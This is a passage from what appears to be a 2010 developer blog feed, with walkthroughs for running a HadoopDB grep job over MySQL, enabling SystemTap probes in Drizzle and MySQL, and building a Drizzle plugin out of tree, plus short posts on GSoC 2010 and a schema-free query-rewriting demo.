with a data partitioner that can partition data into a specified number of partitions. This is not
particularly important for this article since we are running a single-node cluster, so we only have 1
partition. The idea is that each partition can be bulk-loaded into a separate database node
and indexed appropriately.
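
Whether your version of the script writes into HDFS directly or you copy the generated file up
yourself with hadoop fs -put, it's worth confirming the data is sitting where the later steps
expect it (the path below is the one I use for the rest of this article):

&lt;pre&gt;
hadoop fs -ls /data/SortGrep535MB
&lt;/pre&gt;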

For us, we just need to create a database and table in our MySQL database. Since we only have 1
partition, the database name will reflect that. The procedure to load the data set we generated into
our single MySQL node is:

&lt;pre&gt;
hadoop fs -get /data/SortGrep535MB/part-00000 my_file
mysql -u root -ppassword
mysql&gt; create database grep0;
mysql&gt; use grep0;
mysql&gt; create table grep (
    -&gt;   key1 char(10),
    -&gt;   field char(90)
    -&gt; );
mysql&gt; load data local infile 'my_file' into table grep fields terminated by '|' (key1, field);
&lt;/pre&gt;

We now have data loaded into both HDFS and MySQL. The data we are working with is from the grep
benchmark, which is not the best fit for HadoopDB since it is unstructured data. However, since
this article is just about how to set up HadoopDB and not about testing its performance, I didn't
worry about that much.

&lt;h2&gt;HadoopDB Catalog and Running a Job&lt;/h2&gt;

The HadoopDB catalog is stored as an XML file in HDFS. A tool is provided that generates this XML
file from a properties file. For this article, the properties file I used is:

&lt;script src=&quot;http://gist.github.com/394798.js&quot;&gt;&lt;/script&gt;
&lt;br&gt;
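
Since that gist also isn't inline, here is a rough sketch of the kind of entries the properties
file contains (the field names are from my memory of the sample file shipped with HadoopDB, so
treat them as illustrative rather than authoritative):

&lt;pre&gt;
# illustrative field names; check the sample Catalog.properties in the HadoopDB distribution
nodes_file=machines.txt
catalog_file=HadoopDB.xml
unchunked_db_prefix=grep
chunks_per_node=0
port=3306
username=root
password=password
driver=com.mysql.jdbc.Driver
url_prefix=jdbc\:mysql\://
&lt;/pre&gt;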

The machines.txt file must exist; for this article, my machines.txt file had only one entry:
localhost
&lt;br&gt;

Then in order to generate the XML file and store it in HDFS, the following is performed:

&lt;pre&gt;
java -cp $HADOOP_HOME/lib/hadoopdb.jar edu.yale.cs.hadoopdb.catalog.SimpleCatalogGenerator \
&gt; Catalog.properties
hadoop dfs -put HadoopDB.xml HadoopDB.xml
&lt;/pre&gt;

Please note that the above tool is quite fragile and expects the input properties file to be in a
certain format with certain fields. It's pretty easy to break the tool, which is understandable given
that this is a research project.
&lt;br&gt;

We are now ready to run a HadoopDB job! The HadoopDB distribution comes with a bunch of benchmarks
that were used in the paper that was published on HadoopDB. The data I generated in this article
corresponds to the data that was used for their benchmarks so I can use jobs that have already been
written in order to test my setup. 
&lt;br&gt;

I'm using the grep task from the paper to search for a pattern in the data I loaded earlier. Thus,
to kick off a job I do:

&lt;pre&gt;
java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
&gt; -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
&lt;/pre&gt;

Running the job, I see output like the following:

&lt;pre&gt;
java -cp $CLASSPATH:hadoopdb.jar edu.yale.cs.hadoopdb.benchmark.GrepTaskDB \
&gt; -pattern %wo% -output padraig -hadoop.config.file HadoopDB.xml
10/05/08 18:01:41 INFO exec.DBJobBase: grep_db_job
10/05/08 18:01:41 INFO exec.DBJobBase: SELECT key1, field FROM grep WHERE field LIKE '%%wo%%';
10/05/08 18:01:41 INFO jvm.JvmMetrics: Initializing JVM Metrics with processName=JobTracker,
sessionId=
10/05/08 18:01:41 WARN mapred.JobClient: Use GenericOptionsParser for parsing the arguments.
Applications should implement Tool for the same.
10/05/08 18:01:41 INFO mapred.JobClient: Running job: job_local_0001
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Data locality failed for
hadoop1.localdomain
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Task from hadoop1.localdomain is connecting
to chunk 0 on host localhost with db url jdbc:mysql://localhost:3306/grep0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: SELECT key1, field FROM grep WHERE field
LIKE '%%wo%%';
10/05/08 18:01:41 INFO mapred.MapTask: numReduceTasks: 0
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: DB times (ms): connection = 245, query
execution = 2, row retrieval  = 36
10/05/08 18:01:41 INFO connector.AbstractDBRecordReader: Rows retrieved = 3
10/05/08 18:01:41 INFO mapred.TaskRunner: Task:attempt_local_0001_m_000000_0 is done. And is in the
process of commiting
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task attempt_local_0001_m_000000_0 is allowed to commit
now
10/05/08 18:01:41 INFO mapred.FileOutputCommitter: Saved output of task
'attempt_local_0001_m_000000_0' to file:/home/hadoop/padraig
10/05/08 18:01:41 INFO mapred.LocalJobRunner: 
10/05/08 18:01:41 INFO mapred.TaskRunner: Task 'attempt_local_0001_m_000000_0' done.
10/05/08 18:01:42 INFO mapred.JobClient:  map 100% reduce 0%
10/05/08 18:01:42 INFO mapred.JobClient: Job complete: job_local_0001
10/05/08 18:01:42 INFO mapred.JobClient: Counters: 6
10/05/08 18:01:42 INFO mapred.JobClient:   FileSystemCounters
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_READ=115486
10/05/08 18:01:42 INFO mapred.JobClient:     FILE_BYTES_WRITTEN=130574
10/05/08 18:01:42 INFO mapred.JobClient:   Map-Reduce Framework
10/05/08 18:01:42 INFO mapred.JobClient:     Map input records=3
10/05/08 18:01:42 INFO mapred.JobClient:     Spilled Records=0
10/05/08 18:01:42 INFO mapred.JobClient:     Map input bytes=3
10/05/08 18:01:42 INFO mapred.JobClient:     Map output records=3
10/05/08 18:01:42 INFO exec.DBJobBase: 
grep_db_job JOB TIME : 1747 ms.

$
&lt;/pre&gt;

The results are written to the output directory I specified, named padraig (with the local job
runner used here, that directory ended up on the local filesystem, as the log output shows).
Inspecting the results I see:

&lt;pre&gt;
$ cd padraig
$ cat part-00000
~k~MuMq=	w0000000000{XSq#Bq6,3xd.tg_Wfa&quot;+woX1e_L*]H-UE%+]L]DiT5#QOS5&lt;
vkrvkB8	6i0000000000.h9RSz'&gt;Kfp6l~kE0FV&quot;aP!&gt;xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA
]&amp;{`H%]1{E0000000000Z[@egp'h9!	BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`&gt;q*{6=7
$
&lt;/pre&gt;

I can verify this result by going to the data stored in MySQL and performing the same query on it:

&lt;pre&gt;
mysql&gt; select key1, field from grep where field like '%wo%';
+--------------------------------+------------------------------------------------------------------------------------------+
| key1                           | field                                                                                      |
+--------------------------------+------------------------------------------------------------------------------------------+
| ~k~MuMq=                       | w0000000000{XSq#Bq6,3xd.tg_Wfa&quot;+woX1e_L*]H-UE%+]L]DiT5#QOS5&lt;                             |
| vkrvkB8                        | 6i0000000000.h9RSz'&gt;Kfp6l~kE0FV&quot;aP!&gt;xnL^=C^W5Y}lTWO%N4$F0 Qu@:]-N4-(J%+Bm*wgF^-{BcP^5NqA |
| ]&amp;{`H%]1{E0000000000Z[@egp'h9! | BV8p~MuIuwoP4;?Zr' :!s=,@!F8p7e[9VOq`L4%+3h.*3Rb5e=Nu`&gt;q*{6=7                            |
+--------------------------------+------------------------------------------------------------------------------------------+
3 rows in set (0.00 sec)

mysql&gt;
&lt;/pre&gt;

Thus, I can see the same rows were returned by the HadoopDB job.

&lt;h2&gt;Conclusion&lt;/h2&gt;

I didn't get to use the Hive interface to HadoopDB as I had issues getting it going. If I get it
working in the future, I'll likely write about it. HadoopDB is a pretty interesting project and I
enjoyed reading the paper on it a lot. A &lt;a
href=&quot;http://cs-www.cs.yale.edu/homes/dna/papers/hadoopdb-demo.pdf&quot;&gt;demo&lt;/a&gt; of HadoopDB will be
given at SIGMOD this year, which should be interesting.
&lt;br&gt;

Overall, I'm not sure how active the project is. Based on the
fact that a demo is being given at SIGMOD, I'm sure there is research being done on it, but compared
to other open source projects it's difficult to tell how much development is occurring. I'm sure this
has more to do with the fact that it is a research project first and foremost whose source code just
happens to be available. It would be nice to see a mailing list or something pop up around this
project though. For example, if I wanted to contribute a patch, it's not really clear how I should go
about doing that or whether it would be integrated.
&lt;br&gt;

I do think it's some interesting research
though, and I'll be keeping my eye on it and trying to mess around with it whenever I have spare
time. The next thing I want to look into regarding HadoopDB is hooking it up to the column-oriented
database &lt;a href=&quot;http://monetdb.cwi.nl/&quot;&gt;MonetDB&lt;/a&gt;, which I will write about if I get the chance.
</content>
 </entry>
 
 <entry>
   <title>Configuring Drizzle/MySQL for use with SystemTap</title>
   <link href="http://posulliv.github.com/2010/04/02/drizzle-mysql-stap"/>
   <updated>2010-04-02T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/04/02/drizzle-mysql-stap</id>
   <content type="html">In a &lt;a href=&quot;http://posulliv.github.com/2010/02/26/installing-stap.html&quot;&gt;previous&lt;/a&gt; post, I went
through the steps involved to install SystemTap on a Linux box. Now, I'd like to show how to
configure drizzle and MySQL for use with SystemTap.&lt;br&gt;

First of all, you need to make sure the dtrace python script that is used by SystemTap is in your
path. If it is not, and you are on Ubuntu, you need to install the systemtap-sdt-dev package as
mentioned in my last post. Assuming our system is set up correctly, we can build drizzle as follows:

&lt;pre&gt;
$ bzr branch lp:drizzle stap
$ cd stap
$ ./config/autorun.sh
$ ./configure --enable-dtrace
$ make
&lt;/pre&gt;

The drizzle binary will now have support for static stap probes. In order to verify this and see
what probes are present in drizzle, let's start a drizzle server and list the probes in the server
process:

&lt;pre&gt;
$ cd tests
$ ./dtr --start-and-exit
$ sudo stap -l 'process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;*&quot;)'
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__rdlock__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__wrlock__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__unlock__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__rdlock__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__wrlock__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;cursor__unlock__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__row__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__row__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__row__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__row__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__row__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__row__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;connection__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;filesort__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;filesort__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__opt__choose__plan__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__opt__choose__plan__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;connection__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__select__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;command__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;command__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__exec__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__exec__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__parse__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;query__parse__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;select__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;select__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;update__done&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;delete__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__start&quot;)
process(&quot;/home/posulliv/repos/drizzle/uc/drizzled/drizzled&quot;).mark(&quot;insert__select__start&quot;)
$
&lt;/pre&gt;

The argument to your process function should be the path to your drizzle binary.

The process for MySQL is very similar. I'm going to just list the build commands and show the probes
that are present in MySQL:

&lt;pre&gt;
$ bzr branch lp:mysql-server mysql-stap
$ cd mysql-stap
$ ./BUILD/autogen.sh
$ ./configure --enable-dtrace
$ make
$ cd mysql-test
$ ./mtr --start &amp;
$ sudo stap -l 'process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;*&quot;)'
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__write__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__write__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__read__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;net__read__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;connection__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;connection__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__parse__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__parse__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__update__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__update__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__select__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__select__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__delete__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;multi__delete__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__exec__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__exec__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;command__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;command__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;select__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;select__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;filesort__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;filesort__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__rdlock__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__wrlock__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__unlock__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__rdlock__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__wrlock__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;handler__unlock__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;delete__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;insert__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;update__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__cache__hit&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__cache__miss&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;read__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;read__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;index__read__row__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;index__read__row__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__block&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__hit&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__read__miss&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__write__done&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__write__start&quot;)
process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;keycache__write__block&quot;)
$
&lt;/pre&gt;

You can see that there are probes in MySQL which would not make sense for Drizzle, such as probes
related to the query cache and keycache. In Drizzle, we are also starting to add probes around the
optimizer, but it is slow going.
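
As a quick taste of what these probes enable, a one-liner like the following prints each query as
it starts (a sketch only; that query__start passes the query text as its first argument is my
reading of the probe definitions in the MySQL source, so verify against your tree):

&lt;pre&gt;
$ sudo stap -e 'probe process(&quot;/home/posulliv/repos/mysql/uc/sql/mysqld&quot;).mark(&quot;query__start&quot;) { printf(&quot;query: %s\n&quot;, user_string($arg1)) }'
&lt;/pre&gt;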

That's it for now. I'll probably write a brief post next week demonstrating using these probes in
MySQL and Drizzle. I'll be covering more in my presentation at the MySQL user's conference in a few
weeks.
</content>
 </entry>
 
 <entry>
   <title>Drizzle Accepted for GSoC 2010</title>
   <link href="http://posulliv.github.com/2010/03/18/drizzle-soc"/>
   <updated>2010-03-18T00:00:00-07:00</updated>
   <id>http://posulliv.github.com/2010/03/18/drizzle-soc</id>
   <content type="html">I just found out today that Drizzle was accepted as its own project for Google's Summer of Code this
year. Our organization is listed &lt;a
href=&quot;http://socghop.appspot.com/gsoc/org/show/google/gsoc2010/drizzle&quot;&gt;here&lt;/a&gt;.&lt;br&gt; 

I'm acting as the program administrator for Drizzle this year with &lt;a href=&quot;http://oddments.org/&quot;&gt;Eric Day&lt;/a&gt; and I'm really excited about it. Last
year, I myself was a &lt;a
href=&quot;http://posulliv.github.com/2009/04/21/google-summer-of-code.html&quot;&gt;student in GSoC&lt;/a&gt; working on drizzle and I feel like I got a lot out of
that program so I really wanted to see Drizzle accepted as its own project this year. Hopefully,
we can get lots of students working with us this year.&lt;br&gt;

As someone who participated as a student and is now acting as a mentor, I can say that it is
probably the best summer job any student could get. Basically, you get paid to work on an
open-source project with awesome people and work from home. It can't really get much better if you
ask me.&lt;br&gt;

And any students interested in working on Drizzle should check out our ideas page on the &lt;a
href=&quot;http://drizzle.org/wiki/Soc&quot;&gt;wiki&lt;/a&gt;. 

</content>
 </entry>
 
 <entry>
   <title>Out of Tree Plugins in Drizzle</title>
   <link href="http://posulliv.github.com/2010/03/10/out-of-tree-plugin"/>
   <updated>2010-03-10T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/03/10/out-of-tree-plugin</id>
   <content type="html">This week I've been working on porting the prototype MySQL storage engine developed at &lt;a
href=&quot;http://akibainc.com&quot;&gt;Akiban&lt;/a&gt; to Drizzle. While doing this, I discovered that in Drizzle, it is
possible to build a plugin out of tree. When I say out of tree, I mean that I can develop a plugin
for drizzle and build it without having a copy of the drizzle source code. This is amazingly convenient
and is mostly due to the awesome build system that &lt;a href=&quot;http://inaugust.com/&quot;&gt;Monty&lt;/a&gt; has put together.
This build system is called &lt;a href=&quot;https://launchpad.net/pandora-build&quot;&gt;Pandora Build&lt;/a&gt; and if
you are ever working on a project that needs to use autoconf-related tools, you should really check it out.
It's friggin' awesome. It lets you concentrate on development instead of having to spend a bunch of
time trying to get a good build environment set up.&lt;br&gt;

Anyway, here I am going to go through an example of how to build a drizzle plugin out of tree. The
code is available at lp:~posulliv/drizzle/out-of-tree-example if anyone is interested in looking at
it. I am going to take an existing plugin in the drizzle source tree I developed and show how to
build it out of tree. The plugin I'm going to work with is the &lt;a
href=&quot;http://posulliv.github.com/2009/09/29/viewing-memcached-statistics-from-drizzle.html&quot;&gt;memcached_stats&lt;/a&gt;
plugin.&lt;br&gt;

Before starting, it's worth noting that Monty is working on creating a one-step tool for taking a
plugin that is currently in drizzle's source tree (that is, in the plugin directory of a drizzle
tree) and making it possible to build that plugin out of tree. His goal is that there need be no
difference in content between a directory that's in the drizzle source tree and one that's outside the
source tree.&lt;br&gt;

For this post, we will assume that we are working in a directory named mc-stats-plugin. Before
starting, this directory just contains source files. We will be adding all the build-related files
that are needed to build it.&lt;br&gt;

The first thing that is needed is a plugin.ini file for the plugin. For an out-of-tree plugin, a
name and url are required. Thus, the plugin.ini file for this plugin will look like:

&lt;pre&gt;
[plugin]
name=memcached_stats
title=Memcached Stats in DATA_DICTIONARY tables
description=Some DATA_DICTIONARY tables that provide Memcached stats
url=http://memcached.org/
version=0.1
disabled=yes
load_by_default=no
author=Padraig O Sullivan
license=PLUGIN_LICENSE_BSD
headers=stats_table.h analysis_table.h sysvar_holder.h
sources=memcached_stats.cc stats_table.cc analysis_table.cc
build_conditional=&quot;${ac_cv_libmemcached}&quot; = &quot;yes&quot; -a &quot;x${MEMCACHED_BINARY}&quot; != &quot;xno&quot;
ldflags=${LTLIBMEMCACHED}
&lt;/pre&gt;

Once that's done, we need to create a config directory and copy a few files from drizzle's trunk:

&lt;pre&gt;
$ cp $DRIZZLE_SRC_ROOT/config/config.rpath ./config/.
$ cp $DRIZZLE_SRC_ROOT/config/pandora-plugin ./config/.
$ cp -R $DRIZZLE_SRC_ROOT/m4 .
&lt;/pre&gt;

Like I said before, Monty is working on a tool that will automate the steps above. Now, we can
proceed and start compiling our plugin:

&lt;pre&gt;
$ ./config/pandora-plugin
$ autoreconf -i
libtoolize: putting auxiliary files in AC_CONFIG_AUX_DIR, `config'.
libtoolize: copying file `config/config.guess'
libtoolize: copying file `config/config.sub'
libtoolize: copying file `config/install-sh'
libtoolize: copying file `config/ltmain.sh'
libtoolize: putting macros in `m4'.
libtoolize: copying file `m4/libtool.m4'
libtoolize: copying file `m4/ltoptions.m4'
libtoolize: copying file `m4/ltsugar.m4'
libtoolize: copying file `m4/ltversion.m4'
libtoolize: copying file `m4/lt~obsolete.m4'
libtoolize: Remember to add `LT_INIT' to configure.ac.
libtoolize: Consider adding `AC_CONFIG_MACRO_DIR([m4])' to configure.ac and
libtoolize: rerunning libtoolize, to keep the correct libtool macros in-tree.
configure.ac:7: installing `config/compile'
configure.ac:7: installing `config/missing'
Makefile.am: installing `config/depcomp'
$ ./configure
...
$ make
make  all-am
make[1]: Entering directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
  CXX    libmemcached_stats_plugin_la-memcached_stats.lo
  CXX    libmemcached_stats_plugin_la-stats_table.lo
  CXX    libmemcached_stats_plugin_la-analysis_table.lo
  CXXLD  libmemcached_stats_plugin.la
make[1]: Leaving directory `/home/posulliv/repos/drizzle/mc-stats-plugin'
$
&lt;/pre&gt;

Now, our plugin is built. To install it, we simply do a make install and give the
--plugin_add=memcached_stats option to drizzled when we start the server.&lt;br&gt;
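
Concretely, that amounts to something like the following (the drizzled invocation is a sketch;
adjust it for your install prefix and whatever other server options you normally pass):

&lt;pre&gt;
$ sudo make install
$ drizzled --plugin_add=memcached_stats
&lt;/pre&gt;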

I just think this process
makes my life a whole lot easier and I wanted to bring some attention to how easy drizzle makes
developing plugins.


</content>
 </entry>
 
 <entry>
   <title>Schema-Free Drizzle!</title>
   <link href="http://posulliv.github.com/2010/03/02/schema-free-drizzle"/>
   <updated>2010-03-02T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/03/02/schema-free-drizzle</id>
   <content type="html">I came across this &lt;a href=&quot;http://www.igvita.com/2010/03/01/schema-free-mysql-vs-nosql/&quot;&gt;post&lt;/a&gt; from 
&lt;a href=&quot;http://www.igvita.com&quot;&gt;Ilya Grigorik&lt;/a&gt; on &lt;a href=&quot;http://news.ycombinator.com/&quot;&gt;Hacker News&lt;/a&gt; 
yesterday and I figured I just had to implement this in Drizzle now with the new query rewriting
interface that I mentioned &lt;a href=&quot;http://posulliv.github.com/2010/03/01/query-rewrite.html&quot;&gt;yesterday&lt;/a&gt;.
The awesome thing about Drizzle is that I can try all these ideas out easily by just implementing a
plugin.
&lt;br&gt;

Any SQL statement we want to run against our schema-free constructs has to be prefixed with the
string 'nos'. With that said, here is a session demonstrating this query rewriting plugin:

&lt;pre&gt;
Your Drizzle connection id is 2
Server version: 7 Source distribution (schema-less)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle&gt; use test;
Database changed
drizzle&gt; nos create table widgets;
Query OK, 0 rows affected (0.06 sec)

drizzle&gt; nos insert into widgets (id,name) values ('a', 'apple');
Query OK, 1 row affected (0.19 sec)

drizzle&gt; nos insert into widgets (id,name,type) values ('b', 'blackberry', 'phone');
Query OK, 1 row affected (0.21 sec)

drizzle&gt; nos select * from widgets;
+------+------------+-------+
| id   | name       | type  |
+------+------------+-------+
| a    | apple      | NULL  | 
| b    | blackberry | phone | 
+------+------------+-------+
2 rows in set (0 sec)

drizzle&gt; nos select * from widgets where id = 'a';
+------+-------+------+
| id   | name  | type |
+------+-------+------+
| a    | apple | NULL | 
+------+-------+------+
1 row in set (0 sec)

drizzle&gt;
&lt;/pre&gt;
&lt;br&gt;

The code for this is available on Launchpad (lp:~posulliv/drizzle/schema-less). I threw this
together in a few hours today for fun so it is what it is. 

</content>
 </entry>
 
 <entry>
   <title>Query Rewriting Plugin Point for Drizzle</title>
   <link href="http://posulliv.github.com/2010/03/01/query-rewrite"/>
   <updated>2010-03-01T00:00:00-08:00</updated>
   <id>http://posulliv.github.com/2010/03/01/query-rewrite</id>
   <content type="html">One of the first tasks in my new position at &lt;a href=&quot;http://akibainc.com&quot;&gt;Akiban&lt;/a&gt; was to create
a plugin point within Drizzle for query rewriting.
&lt;br&gt;

The first decision to make was where to insert a plugin point for a query rewriter. The parsed
